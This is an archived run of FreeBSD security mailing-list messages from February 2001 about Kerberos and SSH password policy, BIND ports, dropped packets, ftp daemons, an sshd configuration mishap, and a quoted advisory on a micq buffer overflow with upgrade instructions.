owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 21:13:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id CAAE337B491; Fri, 2 Feb 2001 21:13:33 -0800 (PST) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id AAA94021; Sat, 3 Feb 2001 00:13:30 -0500 (EST) (envelope-from wollman) Date: Sat, 3 Feb 2001 00:13:30 -0500 (EST) From: Garrett Wollman Message-Id: <200102030513.AAA94021@khavrinen.lcs.mit.edu> To: Robert Watson Cc: security@FreeBSD.ORG Subject: Re: PAM/SSH and KerberosIV? In-Reply-To: References: <200101310049.f0V0n1f15852@green.dyndns.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I ran through the tests, and the following occurs: without the > pam_kerberosIV.so entry in /etc/pam.conf, you cannot log in using > kerberos. My feeling is that enabling pam_kerberosIV for anything other than login and xdm is an exceedingly poor idea. It's bad enough that most SSH clients confuse the issue by prompting for the password as if it were being processed locally. At least if you make users kinit manually, there's a fair understanding of what is actually happening where. The entire point and design of Kerberos is that you never, ever send your password over the net, not even over an encrypted channel except to change it. My own personal policy, which many would call overly strict, is to set `PasswordAuthentication no' on any sshd which knows how to do Kerberos. (I can't always implement my own policy even on machines completely under my control.) -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 21:25: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (mx0.roble.com [206.40.34.14]) by hub.freebsd.org (Postfix) with ESMTP id E7F3F37B503 for ; Fri, 2 Feb 2001 21:24:46 -0800 (PST) Received: from localhost (marquis@localhost) by roble.com with ESMTP id f135OkO50079 for ; Fri, 2 Feb 2001 21:24:46 -0800 (PST) Date: Fri, 2 Feb 2001 21:24:46 -0800 (PST) From: Roger Marquis To: security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Wes Peters wrote: > > Bind was written on BSD. What's the point of using a port to > > upgrade it? All FreeBSD's bind port does is increase your chances > > of errors, reduce your system's overall QA, and install duplicate > > files in non-standard places. > > You completely and utterly fail to understand how the ports system works. > What FreeBSD's bind port really does is decrease your chance of errors, > increase your systems's overall QA, install all of the bind configuration > and executable files in standard FreeBSD locations, track which files > were installed and allow you to deinstall them simply, and provide a > one-stop upgrade path. Wes, I believe you "utterly fail to understand" the level of quality assurance in FreeBSD's ports collection. Certainly ports are vastly better than Linux rpms but they have more than enough bugs to render such blind faith ill-advised. Install bind first via ports and then via the bind-supplied Makefile. You may find, as I did, that the port _increases_ your chances of errors and _does_not_ install files in their original locations. The only feature this particular port adds, when it works, is a log under /var/db/pkg that's easier to parse than `make -n`. I've been big fan of ports since 2.0.5. They are, IMHO, FreeBSD's best feature. However, that does not mean they should be trusted like a Windows setup.exe. -- Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Feb 3 7:32:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id 54FA637B401 for ; Sat, 3 Feb 2001 07:32:40 -0800 (PST) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id CAA20696; Sun, 4 Feb 2001 02:32:29 +1100 (EST) From: Darren Reed Message-Id: <200102031532.CAA20696@caligula.anu.edu.au> Subject: Re: strange dropped packets In-Reply-To: from Michal Mertl at "Feb 2, 1 11:55:22 am" To: mime@traveller.cz (Michal Mertl) Date: Sun, 4 Feb 2001 02:32:29 +1100 (EST) Cc: security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL39 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Michal Mertl, sie said: > I've installed and configured several FreeBSD boxes (>=4.1). On all of > them I use log_in_vain="YES" in rc.conf. Sometime I also install ipfilter > (with rules with minimal holes in and outbound traffic with "keep state"). > Either with ipfilter installed or not I see dropped packets in > /var/log/messages (result of log_in_vain) which seems to me like last > packets of a regular communications open from inside (either UDP (dns > queries) or TCP (mostly web)). On the internet today, I wouldn't be surprised if some packets can transit the network and take enough time that the state a connection is in causes it to expire before the "next" packet arrices. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Feb 3 10:30: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 7B26137B491; Sat, 3 Feb 2001 10:29:40 -0800 (PST) Received: (from root@localhost) by giganda.komkon.org (8.9.3/8.9.3) id NAA71216; Sat, 3 Feb 2001 13:29:39 -0500 (EST) (envelope-from str) Date: Sat, 3 Feb 2001 13:29:39 -0500 (EST) From: Igor Roshchin Message-Id: <200102031829.NAA71216@giganda.komkon.org> To: security-officer@freebsd.org, security@freebsd.org Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:14.micq Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! micq packages (at least for 3-stable and 4-stable) are not available yet. Is it that they just haven't been generated yet, or somebody forgot about them ? Just reminding... Thanks. Igor > From owner-freebsd-security-notifications@FreeBSD.ORG Tue Jan 30 04:26:25 2001 > Date: Tue, 30 Jan 2001 01:25:01 -0800 (PST) > From: FreeBSD Security Advisories > To: FreeBSD Security Advisories > Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-01:14.micq > > -----BEGIN PGP SIGNED MESSAGE----- > > ============================================================================= > FreeBSD-SA-01:14 Security Advisory > FreeBSD, Inc. > > Topic: micq remote buffer overflow vulnerability > > Category: ports > Module: micq > Announced: 2001-01-29 > Credits: recidjvo@pkcrew.org > Affects: Ports collection prior to the correction date. > Corrected: 2001-01-24 > Vendor status: Updated version released > FreeBSD only: NO > > I. Background > > micq is a text-based ICQ client. > > II. Problem Description > > The micq port, versions prior to 0.4.6.1, contains a remote > vulnerability: due to a buffer overflow, a malicious remote user > sending specially-crafted packets may be able to execute arbitrary > code on the local system with the privileges of the micq process. To > accomplish this, the attacker must be able to sniff the packets > between the micq client and ICQ server in order to gain the session > key to cause the client to accept the malicious packets. > > The micq port is not installed by default, nor is it "part of FreeBSD" > as such: it is part of the FreeBSD ports collection, which contains > over 4500 third-party applications in a ready-to-install format. The > ports collections shipped with FreeBSD 3.5.1 and 4.2 contain this > problem since it was discovered after the releases. > > FreeBSD makes no claim about the security of these third-party > applications, although an effort is underway to provide a security > audit of the most security-critical ports. > > III. Impact > > Malicious remote users may cause arbitrary code to be executed > with the privileges of the micq process. > > If you have not chosen to install the micq port/package, then > your system is not vulnerable to this problem. > > IV. Workaround > > Deinstall the micq port/package, if you have installed it. > > V. Solution > > One of the following: > > 1) Upgrade your entire ports collection and rebuild the micq port. > > 2) Deinstall the old package and install a new package dated after the > correction date, obtained from: > > [i386] > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/net/micq-0.4.6.1.tgz > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/net/micq-0.4.6.1.tgz > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/net/micq-0.4.6.1.tgz > > [alpha] > Packages are not automatically generated for the alpha architecture at > this time due to lack of build resources. > > 3) download a new port skeleton for the micq port from: > > http://www.freebsd.org/ports/ > > and use it to rebuild the port. > > 4) Use the portcheckout utility to automate option (3) above. The > portcheckout port is available in /usr/ports/devel/portcheckout or the > package can be obtained from: > > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.4 (FreeBSD) > Comment: For info see http://www.gnupg.org > > iQCVAwUBOnXfalUuHi5z0oilAQEhPQP/aq4wwNE4IFedgd2Fz8IEZo+cfiu5dsPa > P1fNoylanm+TbLBEV+hJwjt5lBQHQoEmMh3efz2x7foj42QMP6YPtw6WPcwbXtVQ > uTSra4+3Ck2NdO+5WDju2X0kMbIBWJMCAPrGEpr/EkNbJRu76Ojp6Cw31WBx17X7 > BwLriuu9c9I= > =Iluh > -----END PGP SIGNATURE----- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security-notifications" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Feb 3 11:53:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailout04.sul.t-online.com (mailout04.sul.t-online.com [194.25.134.18]) by hub.freebsd.org (Postfix) with ESMTP id C10B637B401 for ; Sat, 3 Feb 2001 11:52:56 -0800 (PST) Received: from fwd00.sul.t-online.com by mailout04.sul.t-online.com with smtp id 14P8js-0004H4-05; Sat, 03 Feb 2001 20:52:52 +0100 Received: from ramses.local (320080844193-0001@[217.2.187.195]) by fmrl00.sul.t-online.com with esmtp id 14P8jo-1kPwXYC; Sat, 3 Feb 2001 20:52:48 +0100 Received: from haribeau by ramses.local with local (Exim 3.12 #1 (Debian)) id 14P9gC-0001Cm-00 for ; Sat, 03 Feb 2001 21:53:08 +0100 Date: Sat, 3 Feb 2001 21:53:08 +0100 From: Clemens Hermann To: freebsd-security@FreeBSD.org Subject: Re: ftp Message-ID: <20010203215308.G1412@ramses.local> Mail-Followup-To: Clemens Hermann , freebsd-security@FreeBSD.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: von Matt Heckaman am 02.Feb.2001 um 15:16:13 (-0500) X-Mailer: Mutt 1.2.5i (Linux 2.2.17 i586) X-Sender: 320080844193-0001@t-dialin.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Am 02.02.2001 um 15:16:13 schrieb Matt Heckaman: Hi Matt, > : Another way is to use wu-ftpd, and "man ftpaccess" > > Otherwise known as root-exploits-R-us :) I have been looking for a rather secure ftp-daemon. At the moment I am using proftpd because I really need the virtual-user feature. With this I can avoid the transmission of system-passwords via ftp. Any user is a pseudo-uid in the proftpd users file. This is - in my opinion - a really good thing for ftp because so you can keep you system users/passwords secret. Anyway I would appreciate it a lot if I could switch to the normal FreeBSD ftpd. Is there one way to get something like the virtual proftpd users to run with ftpd? thanks in advance /ch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Feb 3 12:17:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 7D45A37B503; Sat, 3 Feb 2001 12:16:12 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id E86A4BA74C; Sat, 3 Feb 2001 12:16:43 -0800 (PST) Date: Sat, 3 Feb 2001 12:16:43 -0800 From: Kris Kennaway To: Igor Roshchin Cc: security-officer@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:14.micq Message-ID: <20010203121643.C40178@xor.obsecurity.org> References: <200102031829.NAA71216@giganda.komkon.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="R+My9LyyhiUvIEro" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200102031829.NAA71216@giganda.komkon.org>; from str@giganda.komkon.org on Sat, Feb 03, 2001 at 01:29:39PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --R+My9LyyhiUvIEro Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sat, Feb 03, 2001 at 01:29:39PM -0500, Igor Roshchin wrote: >=20 > Hello! >=20 > micq packages (at least for 3-stable and 4-stable) are not > available yet. >=20 > Is it that they just haven't been generated yet, or > somebody forgot about them ? They're generated automatically by bento.freebsd.org. I don't know what's going on, they should be getting built (bento doesn't complain about any build errors). Kris --R+My9LyyhiUvIEro Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6fGcrWry0BWjoQKURAoHyAJ9MJMMiQxdtYBepVGzX9wf7TWk3pQCg+6W6 LckPE9wYKuUXQdDcJhC8xmM= =xXi6 -----END PGP SIGNATURE----- --R+My9LyyhiUvIEro-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Feb 3 19:18:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id D626A37B491 for ; Sat, 3 Feb 2001 19:18:33 -0800 (PST) Received: (qmail 9640 invoked by uid 0); 4 Feb 2001 03:18:32 -0000 Received: from p3ee21645.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.69) by mail.gmx.net (mail01) with SMTP; 4 Feb 2001 03:18:32 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id VAA22346 for freebsd-security@FreeBSD.org; Sat, 3 Feb 2001 21:23:21 +0100 Date: Sat, 3 Feb 2001 21:23:21 +0100 From: Gerhard Sittig To: freebsd-security@FreeBSD.org Subject: Re: ftp Message-ID: <20010203212321.P253@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.org References: <20010203215308.G1412@ramses.local> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20010203215308.G1412@ramses.local>; from haribeau@gmx.de on Sat, Feb 03, 2001 at 09:53:08PM +0100 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Feb 03, 2001 at 21:53 +0100, Clemens Hermann wrote: > > At the moment I am using proftpd because I really need the > virtual-user feature. With this I can avoid the transmission of > system-passwords via ftp. Any user is a pseudo-uid in the > proftpd users file. This is - in my opinion - a really good > thing for ftp because so you can keep you system > users/passwords secret. Anyway I would appreciate it a lot if > I could switch to the normal FreeBSD ftpd. Is there one way to > get something like the virtual proftpd users to run with ftpd? $ grep ftp /etc/inetd.conf $ ldd /usr/libexec/ftpd It supports PAM. This should allow you to authenticate users against any form of textfile, database or network daemon. It's just that you had to examine this yourself since I never tried and thus cannot tell for sure how well it works (don't use ftp at all around here) ... :) virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Feb 3 22:13:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from dt051n37.san.rr.com (dt051n37.san.rr.com [204.210.32.55]) by hub.freebsd.org (Postfix) with ESMTP id 2E21B37B401; Sat, 3 Feb 2001 22:13:37 -0800 (PST) Received: from gorean.org (master [10.0.0.2]) by dt051n37.san.rr.com (8.9.3/8.9.3) with ESMTP id WAA73471; Sat, 3 Feb 2001 22:13:35 -0800 (PST) (envelope-from DougB@gorean.org) Message-ID: <3A7CF30F.249FD032@gorean.org> Date: Sat, 03 Feb 2001 22:13:35 -0800 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.76 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Ade Lovett Cc: Rasputin , freebsd-security@FreeBSD.org, imp@village.org Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) References: <20010124230626.A49802@citusc17.usc.edu> <20010125103255.A78404@FreeBSD.org> <200101262153.f0QLrLL40016@earth.backplane.com> <20010129095752.A37233@dogma.freebsd-uk.eu.org> <20010129101411.A16899@FreeBSD.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ade Lovett wrote: > > On Mon, Jan 29, 2001 at 09:57:53AM +0000, Rasputin wrote: > > In general I'd agree with Matt and aDe, but if a directive > > affecting security has changed, I'd say it's better to be notified of it > > as soon as possible. > > Killing off sshd obviously makes remote admin a real problem, though; > > is there another way to guarantee we'd notice ? > > Well, something in /usr/src/UPDATING might have helped. > Believe it or not, I do read it. Nothing there. > > Update -stable box, run mergemaster, ignore anything to do with > ssh_config or sshd_config since ours are fairly heavily different, > reboot, no sshd. This, BTW, is one of the reasons I'm so fascist about mm displaying diffs when files are actually different. Every once in a while, things like this happen. Whether they _should_ happen or not is a whole different question. Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message